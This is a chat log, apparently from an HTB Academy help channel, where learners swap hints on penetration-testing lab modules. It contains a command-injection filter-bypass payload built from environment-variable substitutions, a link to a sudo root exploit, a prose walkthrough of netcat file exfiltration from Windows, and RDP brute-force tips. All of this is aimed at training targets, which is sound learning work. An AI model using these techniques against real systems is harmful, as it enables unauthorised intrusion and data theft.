I tried namping the target IP (nmap -sA 10.129.69.112 -Pn)
but got:
Host is up. All 1000 scanned ports on 10.129.69.112 are in ignored states.

If I dont add the -Pn flag then I get "Host seems down. If it is really up, but blocking our ping probes, try -Pn"

So how would I go about finding open ports for Windows server target

On Linux module: name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k? I typed "find / -type f -name *.conf -user root -size +25k -newermt 2020-03-03" I get a huge amount of files and Permission denied? What am I doing wrong? & How to I exclude file over 28k? -exec command?

Try without -sA ?

Was there a reason you were trying an ACK scan specifically?

originally I tried -sV -n 10.129.69.112 and got: "Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn" so thought maybe firewall issue

try sudo before the command and add -size -28k

mind you initially i tried pinging the target ip and got nothing ... even the target machine loaded very slowly so either I am missing something or the servers are acting up today

htb-student is not in the sudoers file. This incident will be reported.😱 😂

LOL sound a bit dramatic ... but since it said permission denied you need to add sudo before the command as you are calling for all the files including those maintained by root user

I did add sudo and that's the reply I got🤣

which module you on?

yo

Linux Fundamentals:Find Files and Directories : Q1

do u know

how to hack into insta?

acc?

I would suggest reading the rules.🤦‍♂️ 😱

DM

sorry mate we only know how to hack the box

yah my bad

needed some urgent helped

anyone finished the Metasploit Framework module? Need some clarifications with the EternalRomance related question ... I am unable to scan for ports is this a technical issue or am I missing something

Hey, someone can help with the Predictable Reset Token in the Broken Authentication module? I think I have everything in order but it doesn't work

I am confused on which question you are referring to.

DM me

"Use the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator's desktop and submit the contents as the answer." I tried to nmap (using -sV and -Pn flag) the ip but keep getting "Host is up. All 1000 scanned ports on 10.129.172.143 are in ignored states."

Use -p- to scan all ports

Where can i find the footprinting list?

check the resources link at the top of the module

si

thanks 😄

you dont need nmap. you only need msfconsole

search for ms17

dm me if you still cant get it

sure

anyone online that has completed password attacks?

Where to discuss help on offshore pro labs

https://discord.com/channels/473760315293696010/569167103077122058

🖐️

Im on the password reuse section and I am a bit confused on what I need to do. I can ssh using the credentials from the previous section, and I can see 2 other users. Do I need to use crackmapexec to brute one of those users? Or is teh answer in a readable file?

I have also been searching for a long time. In the end, there is a link in the text of the module that leads you to a password list. Try these passwords

Command injection assessment have anyone got the ||base64 payload to work bash(<<<) blablabla also by encoding c”a”t to read the flag|| ?

nm found it

Hi i am stuck on the same question, I've done all steps with fuzzing, but my responses are css and i cant forward them, can anyone help?

Did you use intruder?

yes

This is the response that i get

DM me

hey, I am working on hacking wordpress final

but when I scan the site, it was reported not using wordpress

is it normal? I use wappalyzer and wpscan

hint ||the wordpress isn't on that domain||

grab cubes

can someone give me a hint on the Broken Authentication skills assesment? I access the ||support|| user and enumerate other, but can't get the admin panel

the ||support|| isn't a admin user, you have to find the admin user hint ||that user have the admin same code||

omg got it, I kept wondering why there is a useless link

thanks for helping

Can someone give me a second set of eyes? I'm doing the Live engagement under shells and payloads. I know host 1 is vulnerable to a certain payload but the msfvenom payload isn't working nor is the metasploit payload.

can someone help me out with the RDP brute force in the Password Attacks - Network Services?

Hi, what was the value that you got for the number of users? Is it 604? I executed the following using the Neo4j console
MATCH (u:User) RETURN COUNT(u)

Could I get a sanity check for Whitelist Filters on File Upload Attacks?

Hi,I am stuck on Attacking Common Services:Hard. Need your help in MSSQL Transact command. Can I dm someone?#got it Thx

The first scan gave me over 1000 users. The other two were 604. Could have been a mixup.

Has anyone here gotten the security+ cert? If so, how long would you recommend studying for it? Are there any modules on hackthebox that good to do before taking it?

Security+ is a very basic cert. Pretty much everything on HTB is beyond its scope. I would recommend looking at courses on udemy or professor Messer on YouTube

thank you

Can someone help me with the Footprinting module in the IMAP/POP3 section. I don’t no where I find the admin email my first idea was that the cto mail is the admin mail but it’s wrong

@vital adder can I dm you?

sure

Hello. I am stuck with Skill Assessment - Broken Authentication module. I have found a administrator user and also discovered encoding procedure for cookie. However I do not know how to proceed from here on. When I use the cookie with this admin user, I do not see any flag, in fact, the webpage seems the same as for the normal guest.

Does anyone know any resources that would help with the Hardware challenges?

What's the problem? Have you tried hydra with the provided files?

Hey, there is any module that cover CSRF? I can't find one

Intro to web apps touches on it

Session Security also touches on it a bit, actually a lot. lol

what shell did you try?

@pine dagger is right, use the provided lists and you will get it.

And a little patience because Hydra is not the quickest.

I'm struck in command injections module --bypassing other blacklisted characters

Use what you learned in this section to find name of the user in the '/home' folder. What user did you find?

please help me guys

hello, anyone who has completed the skill assessment of command injection module?

not sure I remember but u can dm me if u want

hey @tight mesa can you help me with the 7th assignment - bypassing other blacklisted characters bro please

yes, sure DM

i'm on the "Web Service & API Attacks" "Skill assessment". I found the flag but not with the SQLi. The python script works fine for "ExecuteCommand" but idk why when i try to "login" it doesn't give me any result. anyone ?

HELLO

Imma bit stuck at Enumeration with Nmap. I was able to find all of the tcp ports scanned but I got stuck in finding out where is the hostname of the target. I tried different methods in finding the hostname but haven't found it. Would appreciate the tips and help. It mentions how it is "case-sensitive"

Hej! Can someone really help me with the SNMP Footprinting module? 'am totally stuck at the last question where it asks me to "Enumerate the custom script that is running on the system". I can see only one service snmpd service running but dunno how to view the output.

You just need to try with some of the other options. I personally just did it with one of the commands from the service enumeration chapter. 🙂

I appreciate it, maybe there is just some silly mistake on my end.

It's weird because when I type -sV or -sC in the scan it takes a much longer time to load than usual. So I wasn't sure if I had to wait or if something was wrong.

They take longer, yeah

Ahh shoot I got the answer. Looks like I was too impatient to wait was all. Lol

Hello! Can someone tell me how can I avoid this? In the Password attacks - Network Services (RDP), I try to use hydra with the wordlists provided and I keep getting an error that basically hydra keeps trying a username with "" password and then stop because of too many connection errors, after brute forcing with some credentials in the wordlists but not all of them

Thank you but I was able to figure it out. I was using Tun0 as my listener when I should have been using eth1.

FACTS

HI all, I've just signed up to the academy. I'm I guessing right, that if I have any questions about any of the modules etc, I post it in here?

Yep!

Brill!!

Hello.
Anyone can help me in DM for the intro to packet network ananlysis module ?

Hi, @rain marlin Were you able to resolve this? I got stuck here as well

Does anyone have a good command to only pull out the first names from dig output?

Maybe with grep.

JavaScript Deobfuscation
Decoding:Using what you learned in this section, determine the type of encoding used in the string you got at previous exercise, and decode it. To get the flag, you can send a 'POST' request to 'serial.php', and set the data as "serial=YOUR_DECODED_OUTPUT".

i believe i have the correct answer but i dont know how it wants it formed

can anyone help?

Lol nope I went to another mod, will come back later and try and figure it out unless someones throws some help with it lol;

Let me know if and when you do

Ok, I'll keep at it first. Not that burned yet.. haha!

Yeah got to the end of the mod and was working on the project and got stuck left it for awhile and came back, thought it'd be a good idea to start over and something must have changed in steps of the mod don't remember some of the stuff in it;

Probably should have kept at it;

@rustic sage DM me 🙂

anyone for webproxies skill assesment?

Sorry for late reply, I was using the resource files and hydra with both the username list and the names implied by the users found with winrm

I tested it less than 2 hours ago, and it works fine.

Follow the RDP example

Got it to work. Apparently I missed the step that I should configure the firewall

What was the step?;

I'm not sure if you did that step, but if you haven't that's what you should do

Have to allow inbound traffic in public profile

You can find the specific rule, but I didn't anymore. I just allowed any incoming traffic for the public profile

The step is not explict. I re-read the following section after the instruction to try to connect to the Share

in the firewall config setting?;

Yes

Awesome thanks, I'll try it and see if that was my problem;

I’m working through the nibbles Initial foothold problem in the getting started module. I’m running the curl commands as shown in the lesson but they take forever to run, if they don’t timeout first. Does anyone know why this is happening?

Hi, i need some help with HTB academy SSTI Exploitation Example 1

@covert stag DM me 🙂

@opaque badger what are you trying to curl? Feel free to dm, worked through it a few days ago!

hi! may I get some sanity check / nudge with Cross-Site Scripting (XSS) Skill Assessment pls?

no jared already helpt me

was a little thing

i used exec

no spoiler

sorry u werent talking to me

im way 2 high man

lifeless completing htb academy modules

brain cpu is getting hot

sorry 4spam

how to start hacking , i know nothing i know the intermediate python thas all

@uneven arch https://academy.hackthebox.com/

Stuck on Footprinting - IMAP/POP3. Looking for email address, enumerated both services, checked both services under the user/pass provided, 0 emails in both

any help would be great!

Ask the question 🙂

The whole module went very quickly and well but I'm stuck and the skill assessment part for the last 2 hours, literally. I tried numerous payloads in all fields (comment, name, email, website). I tried "escaping" the "html sandbox" of wordpress etc etc... I tried googling Wordpress comment xss.. but I'm just stuck . I guess I'd need some nudge in the right direction, I'm sure I'm missing something obvious at this point

as it goes I figure it out shortly after posting here lol. If anyone else is stuck on the same part feel free to reach out!

Oh. Hrm. You can literally do it with the same tricks from the Session Hijacking module. 🙂

and that's exactly what I meant... I just tried again, LITERALLY the same payload I used with Session Hijacking and it worked..... well.. thanks ^^

Oh yeah, I had that happen a couple times. Just need to follow the OSCP mentality I guess.. Try Harder 😄

running against the wall until it breaks to get into the building is not very efficient but looking around to find the entry is way smarter and doesn't require that much effort...
so try smarter

Isn't that what Try Harder means?

do you think running against a wall is smart?

https://tenor.com/view/juggernaut-nope-escape-run-wall-gif-13757929

@drifting knoll If you are hulk yes

xD

I meant, Trying Harder, is also Trying Smarter. 😮

then it should be called "Try Smarter", shouldn't it?

"Thoroughly exhaust all options"

Well, if you want to criticise OS's motto, go right ahead. Not going to bother me.

Both are ok

try harder trying smarter

Trying smarter would boost our marketing strategy ❤️

i am not going to criticise anyone's motto, its about the way of interpretation but what i want to point is that you're actually aware of your own interpretations

Imagine

The point that I was making was more that, things don't always work first time or quickly. Sometimes, trying multiple times does make it work. If it never works, then you find another method.

Agreed with this one

agree, but trying the same thing multiple times and expecting different result is like running against a wall (if you know what i mean 😉 )
finding another method is what i meant by looking for the entry

Yiss

nmap hard lab teaches that pretty quick

And several others ❤️

Oh, I agree. But always worth verifying whether it actually failed, or whether it was just a bit of network glitchiness.

agree on that one too, you're not wrong - just want you guys to become better by taking things/information more precise

and think about what you see

Learning process module has been updated and recently I read - there could be n number of things which could go wrong with a piece of technology, so the most obvious way could might be the most probable as well

for example seeing tcp/80 open doesn't mean its a web server, it also can be some other service, right?

Them be running ftp sometimes

No that can never happen! Its always a web server. Always!

:p

hello

hi

hi

what do you think of those updates?

Just read through one section, which I talked about
And updates are amazing as usual
It feels like I'm having a beautiful conversation with some very like minded individual

I really wanna contribute back to the HTB academy
Last year Ben contacted me I guess, I was having some tonsils issue and he was getting married ❤️

So I couldn't hop on a call with him

But now that I'm doing the academy modules
I've the same spirit to contribute back

I'll actually blog about what it means to me, personally, as using HTB academy

I've used literally everything at this point, almost every named educational platform, I'm having active subs too

appreciate that!
feel free to DM me when you finish reading the Learning Process updates, always happy to hear feedback

But HTB academy I'll place it on the top,
Its like a religious place to me

I'm only about 55% through the modules 😦

keep working on it, its not about the completion, its about to get better and improve

Its more trying to find time for it than anything else. I started about 2 months ago, and worked through all tier 0, tier 1 stuff. About 50% through tier 2 easy stuff, then onto tier 2 medium o/

Stupid work slows me down 😦

maybe it slows you down a bit but it doesn't stop you, right?

it does when I spent 17 hours straight coding to fix a problem

does anyone had problem installing droopescan ?

well try the ROQ model

https://academy.hackthebox.com/module/9/section/1583

this might help you to reduce the amount of time to fix a problem

it was more trying to work around a bug in a product by using the API commands available to me, which drastically limited what I could configure/achieve on the system. Fixed it though. And it worked and looks flawless now. Of course. it'll now suffer from "works on dev machine" issue.

btw, was there some issues with the VPN stability about 6-8 weeks back? I was getting a lot of timeouts between pwnbox and targets.

Hi guys, I am working on the DNS module of Footprinting. Like a lot of people on here I am stuck at "What is the FQDN of the host where the last octet ends with "x.x.x.203"?". I have gotten as far as identifying the transfer. any help would be appreciated.

@vapid isle DM me 🙂

Hi I'm working on the metaploit framework and I'm stuck on sections and jobs. On the last question with the outdated sudo version. I already have a shell and I found the exploit (the on on github). But the exploit does not work. Am I doing something wrong?

Hey, regarding module 18 section 80 (Linux Fundamentals - Filter Contents)

For cURLing the inlanefreight website: what exactly is considered a unique path?
Is ".../file.php/news/" considered non-unique compared to "...file.php/contact/"?
And are also file extensions included for these unique paths?

I was challenged with that definition also. If ever, you can start with the most lax definition (and start to tighten). On reflection, I think the Occam's razor concept would have helped me here 😅

neather pwnbox nor my personal vm seem to be able to install apache. am i just thick as mince?

no matter what i try it keeps comming up conection refused error 405 method not alloud

Hello, I hope I'm not being thick headed but I'm working on Getting Started: Privilege escalation and I'm stuck on question 2 on how to escalate privileges for user 2 to root. I would appreciate it if someone could give me a hint or point me in the right direction. I'm trying to use CHMOD command on the flag.txt file but am stuck on getting arround the password

@dull furnace try looking for ||an ssh key in the root directory :)||

So i dont see an ssh key listed here only the flag file

unless i need to create one?

i think its a hidden folder

/root/.ssh

thanks, I will apply that, funnily I started reading the Occam's Razor section a few minutes ago 😄

you are right it was hidden thank you

Could someone help me with File Inclusion - Basic Bypassess?
I've been trying some stuff but it isn't working at all 😭

@normal laurel make sure you are using the right path ||/index.php?language=languages/||

I am using that path

;-;

try using ||four dots and two slashes||

no luck

DM me

kk

Finally completed it. Lol

Nice!

It's a good feeling. Haha!

Feels like finally cleaning your room, got that out of the way;

Hi guys. New to the OSCP world. I'm having a heck of a time on the https://academy.hackthebox.com/module/77/section/859 knowledge check.
I managed to get a foot hold but cannot for the life of me figure out how to get the privilege escalation to get to root.txt flag.
Been trying to figure out linpeas but everything i find is referring to the .sh file and all I can find is the Peass-ng.

Not sure what I'm doing was hoping for a point in the right direction.

Very excited to be on this journey, would love to get my OSCP cert. Thank you!

@strong creek try running ||sudo -l , there is a GTFObin we can abuse :)||

anyone around complete windows priv esc?

I've finisehd it. what doyou need?

Hi, I'm stuck on the last question (https://academy.hackthebox.com/module/39/section/415). I know that the ||sudo version 1.8.31|| is running and that there is an exploit ||(https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit)|| but I do not manage to run it I always get the error Segmentation fault (core dumped)
what am i doing wrong?

Web attacks assessment, I keep on getting access denied when i try to change the pass. Any heads up? (token and uid are correct tho)

try changing request to ||GET||

I tried that i get ||missing parameters||

did you change it by hand or use "Change request method" in burp repeater

aaaah i see, ty

Hi, I have problems with Bypassing Security Filters in Web Attack module. I tried every request method from PUT to POST, however I always get Malicious Request Denied!. You can DM me.

I have received the needed clarification, thanks for asking though

I am in module Active Directory Enumeration & Attack in section ACL Enumeration

The text says that this command could take 1-2 minutes.

`Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\htb-student> cd c:\tools
PS C:\tools> Import-Module .\PowerView.ps1
PS C:\tools> $sid = Convert-NameToSid dpayne
PS C:\tools> Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}`

But even after 10 minutes I don't get a result.

What am I doing wrong?

After more than 20 minutes, the command has run through. Without result.

Is it possible that the SID is wrong?

Hi. I'm having a hard time submitting the answer on the Javascript Deobfuscation module - decoding chapter. I made the post request and used base64 to convert the response and it came out: 7h15_15_a_s3cr37_m3554g3
But when I submit that I get incorrect answer message. Is it a known issue?

You have to write the flag in || HTB{} ||
eg. || HTB{yourflag} ||

Hi, it should be $sid = Convert-NameToSid forend 😀

Thanks. I tried that too. Still not working

you're missing the last step... read the last part of the question.

Thanks

OH! Your're right! I didn't realize that I actually have to replace the 'YOUR_DECODED_OUTPUT' part 😆

Hello can someone help with a hint on the file inclusion skills assessment section.
I have found the ||admin panel|| and have found which log path that is the right one.. I think.. The ||nginx || one.
I have tried the put in the php get cmd from the poisoning section but without any luck
Feel free to reply here or dm 🙂

I got PTSD from that module ... here is a hint, what else can you poison?

Hi, all. I'm at my wits end with Find Files and Directories (Linux Fundamentals) part about using the find tool. No matter what I put it keeps coming up saying that permission is denied and that the htb-student is not in the sudoers file. I've tried about 10 different variations on all of it, most of it suggested from Google searches and Reddit pages, all with the same result. Can anyone tell me what I'm missing here

are you referring to first question?

Yes, "What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?"

No matter what I try, I always get "htb-student is not in the sudoers file. This incident will be reported" or a list of "permission denied" if I don't put the /dev/null in

Even a simple query such us find / -type f it gets me nowhere, with similar results. Its as if the Pwnbx doesn't allow it!!

ok dm me the command you sent

close the terminal and open it again. Do not use sudo find... but only find

Same again after a reboot. Going to try via VPN through my own VM and see if that works

Hello,
I am currently stuck at Broken Authentication - Bruteforcing Passwords, mainly because of a max tries security mechanism. It is a brute force exercise, so max tries is a pain here. Am i missing something to circumvent it ?

Anyone know what wordlist I should use for the last question on Information Gathering - Web Edition - Virtual hosts: Find the specific vHost that starts with the letter "d" and submit the flag value as your answer (in the format HTB{DATA}). I have tried a handful and im not getting any that start with D

I can't remember exactly but i don't think i had to use other than the smallest ones from SecLists\Discovery\Web-Content or maybe Discovery\DNS

use namelist at SecList\Discovery\DNS

Hi, is anyone free to help with the module Active Directory LDAP?

That was the ticket. Thank you.

you don't need to bruteforce it, do as the question ask, use rockyou-50.txt and filter by the password policy, you will get one or a few passwords only

I think I got blocked to, so I use the last passwords left in the question instead of the machine

Thanks for pointing my mistake. I was using the full rockyou list 🙄

Hi guys sorry for disorder, I have the following problem with this box, can someone help me please

You're welcome

Nice 😉

Dm if you havent solved yet

Dm

Hi, im doing the bash module and i have a little problem (again), when i run the script of loop exercise it returns a message: "***WARNING : deprecated key derivation used." and suggests me to use another flag but idk if its the same decoding method and i need the same cuz it should give me the flag code to finish the section. what should i do?

modify the bash script

if you cant figure it out after a while dm me

ok, ty

its a aes-128cbc code but it has a process than encodes and decodes before

I think I actually used the bash script you create in the comparison operators in order to do the base64 encoding then I manually plugged the output from that into the script they provided in the loops section.

ah i understand, search an alternative method instead repair the code could be easier

well if you look at the example bash script they give you your supposed to create a for loop you already did the work for that in earlier sections. In the comparison operators sectiion you created a for loop that does base64 enconding

yes, so i should retrieve the code after the loop and search a way to use it in the function with another method, right?

Take the variable "9M" and base64 encode it 28 times using the script you created in the comparison operators section. Pipe the output into WC (word count) take that numnber plug it into the salt variable of the script they give you in the loop section.

ok ill try it

ya that script loops 40 times modify it a little make it loop 28 or 29 times

with a for i in {1..28} ?

hi, currently on "attacking common application" "skill assessment 1" think i know the exploit but can't use it. can't find info about ||servlet||

got it!!

you can use any variable I just used i but you can use any character doesnt matter

i know, its only a growing number

thank u ❤️ , i have read the statement wrong 😅

its just to create a loop that iterated 29 times

i didnt see the "count the characters part"

yes, is really easy when you read it well 🤡

again, thank u a lot

👍

any one do footprinting module could use a nudge on the medium lab so far I have scanned open ports on NMAP, mounted the nfs share and found credentials for alex, used alex credentials on smb share and found the "sa" credentials and not sure what to do next.

Struggled through it earlier today 🙂 Make sure to read the hint, especially if you have already found those credentials. Feel free to dm

I probably will made a little more progress just managed to rdp into the windows machine with alex credentials had not done that before

Hello, one question

During MS fundamentals module, 1st section asks me to RDP using a provided command, do I have to use said command in the workspace or do I need to connect to the vpn and use it on my end to connect to the workspace's machine?

Sry if silly question, just a bit confusing

probably using xrfeerdp. Yes use it in pwn box or your own vm or computer while connected to academy vpn tunnel

I'm trying to use it from the box that spawns in the lesson, but it doesnt work

This is all i seem to be getting

what command are you using?

sometimes can be good to exit out close your current terminal open a new one or disconnect and reconnect to the vpn

or refresh the target i.p reset the machine

xfreerdp with the correspondent parameters, /v, /u, /p, all parameters are also provided, so really is almost copy/paste

on windows fundementals what section title are you at? SO I can go into it have a better idea what your dealing with

First one :/

Introduction to Windows

ill DM you

Hi, I'm stuck in the Skills Assesment section of the Web Service & API Attacks module.
I've managed to both get root access and dump the database, but can't find any passwords.
Feel free to reply here or dm, thanks!

you wont find any. You need to enumerate the nodejs files.

did you fuzz for extensions?

Hello friends

hey Jared

I am hating this Password attacks module. It takes FOREVER to crack passwords.

Currently on Attacking active Directory, trying to find the username and password given 3 names.

if you need a nudge let me know

I think im on the right path just have to be patient. I made a user list from the 3 names. Only thing I might be off on is trying crackmap with smb

Guys

sup d00d

When you have the silver annual plan you don't get cubes, right?

I have completed some modules and my cubes are on the same number, it seems that I'm not earning anything

not sure dawg i have never been on a plan

anyone ?
EDIT: Thx @west canopy

@grave dust DM me 🙂

freaking helps to use the right password list lol

cracked all 3 in less than a minute using the right list

For command injections exercise 7 (Bypassing Other Blacklisted Characters) could someone point me in the right direction please for which environment variable to use? Tried using only LS_COLORS variable to no avail, although ping does output successfully which I'm guessing my LS_COLORS command is failing.

||127.0.0.1${LS_COLORS:10:1}${IFS}${LS_COLORS:14:1}${LS_COLORS:1:1}${IFS}${HOME:0:1}${LS_COLORS:24:1}${LS_COLORS:39:1}${LS_COLORS:23:1}${LS_COLORS:152:1}||

@eager rivet i was able to solve it using ||only ${IFS} and ${PATH:0:1}||

same here

Not sure how but thanks both, I'll keep trying 🙂

${IFS} works for spaces ${PATH:0:1} is a /

I couldnt get any LS_COLORS to work

Whenever I put in text though the ping command output is blank, this is where I'm unsure how you've managed to insert text after the / and have ls in there

DM me and we can discuss in detail

Using Web Proxies

Run ZAP Scanner on the target above to identify directories and potential vulnerabilities. Once you find the high-level vulnerability, try to use it to read the flag at '/flag.txt'

can anyone tell me why it is incorrect

make sure you dont have a space in there somewhere

No there is no space

there has to be something. it looks correct to me.

Hey guys sorry to butt in on this convo but I'm trying to ping one of the newbie modules and I'm having 100% packet loss. I tried restarting the target box a few times but nothing seems to work.

check your vpn

make sure you only have one tun interface

if it's a docker target it might not be pingable

Hello guys, this is a dump question but I did not figure it out.
"Excepts from using meterpreter shell. How to download a file from Wimdows to Linux via command line?"

In windows, there is no python so that I cannot setup a simple http server

you could transfer a netcat binary to the windows machine , then use that to transfer files off of it.

ftp?

I did try scp, ftp but does not work because my Kali connect to target windows via openvpn

How to do that? Can you write out command on both side?

ok so lets pretend we want to move root.txt from the windows machine to our attack box

i already have a shell. First i will transfer over a netcat binary

Now on my attack box i start a netcat listener, redirect standard output into the name of the file we want to receive (root.txt)

then run netcat from the windows machine like this

and then if we look back on our attack box we can see the incoming connecting , give it a few seconds to finish, then we can read the flag

@west canopy
Hehe thank you so much 🙈 is there any other way from netcat?

I believe it is a docker target. Not 100% sure thought I just started yesterday.

yep thats a docker, typically u cant ping them and they only have the one port open

ahh that's a pain in the ass because I have to identify services running on the server

Getting Started module?

Yeah

i think we can just ||copy/paste the ip and port into our browser :)||

that worked in my pwnbox thank you so much

np 🙂

Can i shoot you a DM as to not clutter the chat?

clear

sure

Can I dm someone about getting a foothold on the Password Attacks Lab - Hard, I've been bruteforcing the ||rdp ||service for two days now, but so far everything has been unsuccessful 😕

hi everyone

anyone who had completed the File Upload module...!!!!

so, i am curious

i am doing the "Server-Side Attacks - Skills Assessmen" and it says get the flag with server side attack without registering

what happens if i register?

did you use the mutated wordlist?

There is no flag here. Get back to hacking!

I have been stuck on the nibbles web footprinting module for a while now. Every time I attempt it I can't seem to run any of the commands taught in the lesson because they always time out. Any ideas on what the issue may be would be greatly appreciated

It has come to my attention I had 7 vpns running thank you coming to my tedtalk

hello

You started another one to get 8 right?

yo uh, how do i set openvpn up when the GUI doesn't evenload

the gui where?

before i even continue on, am I supposed to setup openVPN on the VM I'm using? sorry if the question sounds dumb since I'm newer to this stuff

all good

if you are using a vm that isnt pwnbox then yes you will need openvpn

if you are on linux you shouldnt need a gui, just
sudo openvpn /path

doesn't work

that path is the object that you downloaded from here

what is the error?

1 sec

Saying error opening configuration files

I haven't even setup ovpn on the VM yet, if that helps

ok you are on a linux?

using virtualbox to run a karli debian linux OS yes

and have you downloaded that file?

starting_point file? yes

the .opvn?

dm

@limpid wharf, or anyone else who might be able to help -- I'm stuck on the "What is the hosting provider for the inlanefreight.com domain?" question in OSINT module (everything else in module done). Am about to try and brute-force the provided "hint" thru Burp (even though I suspect while it's not "wrong", there's more to it than that), but that's how at wits-end I am... presuming you've completed it, any nudge would be greatly appreciated. Thank-you. Thanks for the help AeonArchon -- don't know how anyone is possibly supposed to put that together... I mean, MacGyver may be able to take a rubberband, a paperclip, and a gum wrapper and hack a satellite in space, but even that makes more sense than the solution to this one.

send me the link in dm ill give you hints

hello

can someone help me on this question

Our client wants to know if we can identify which operating system their provided machine is running on. Submit the OS name as the answer

on network enum wit nmap easy lab i couldnt figure out the os

keep saying no exact os match

tried -A -o

yup, i used hydra and the user name provided in the exercise and went through the entire mutated word list, it takes about 8 hours with 4 threads. I got nothing. Maybe I should try to use another tool to bruteforce rdp?